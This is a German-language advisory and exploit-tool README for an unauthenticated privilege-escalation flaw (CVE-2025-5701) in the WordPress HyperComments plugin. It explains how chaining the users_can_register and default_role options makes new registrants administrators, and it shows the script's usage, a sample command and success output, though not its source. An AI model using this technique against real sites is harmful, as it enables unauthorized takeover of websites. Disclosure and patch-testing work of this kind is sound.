
WordPress HyperComments Plugin <= 1.2.2 ist anfällig für Privilegieneskalation.
Schweregrad: KRITISCH (CVSS 9.8)
Betroffenes Plugin: HyperComments für WordPress
Betroffene Versionen: ≤ 1.2.2
Das HyperComments-Plugin für WordPress ist anfällig für unbefugte Änderungen von WordPress-Optionen aufgrund einer fehlenden Berechtigungsprüfung in der Funktion hc_request_handler. Dies ermöglicht nicht authentifizierten Angreifern, beliebige WordPress-Optionen zu aktualisieren, wie z.B.:
users_can_register)default_role)Durch Verkettung dieser Optionen kann ein Angreifer die Registrierung aktivieren und sicherstellen, dass jedem neuen Benutzer automatisch die Administrator-Rolle zugewiesen wird.
CVSS v3.1: 9.8 CRITICAL
AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
CVE-2025-5701 - Unauthenticated Privilege Escalation Exploit
By: Khaled Alenazi (Nxploited)
usage: CVE-2025-5701.py [-h] -u URL
CVE-2025-5701 - Unauthenticated Privilege Escalation Exploit by Khaled Alenazi (Nxploited)
options:
-h, --help show this help message and exit
-u, --url URL Target base URL (e.g., http://target-site.com)
python3 CVE-2025-5701.py -u http://target-site.com
CVE-2025-5701 - Unauthenticated Privilege Escalation Exploit
By: Khaled Alenazi (Nxploited)
[+] Target is vulnerable (version: 1.2.2) - proceeding with exploitation.
[+] Exploit endpoint is accessible.
[+] Server response: {"result":"success"}
[+] Registration is now enabled. New users will be assigned administrator role.
[+] Register here: http://target-site.com/wp-login.php?action=register
Exploit by: Khaled Alenazi (Nxploited)
Dieses Skript wird nur für Bildungszwecke bereitgestellt. Unbefugter Zugriff auf Systeme ohne Genehmigung ist illegal und unethisch. Verwenden Sie es nur in kontrollierten Umgebungen oder mit ausdrücklicher Genehmigung.
Nxploited (Khaled_alenazi)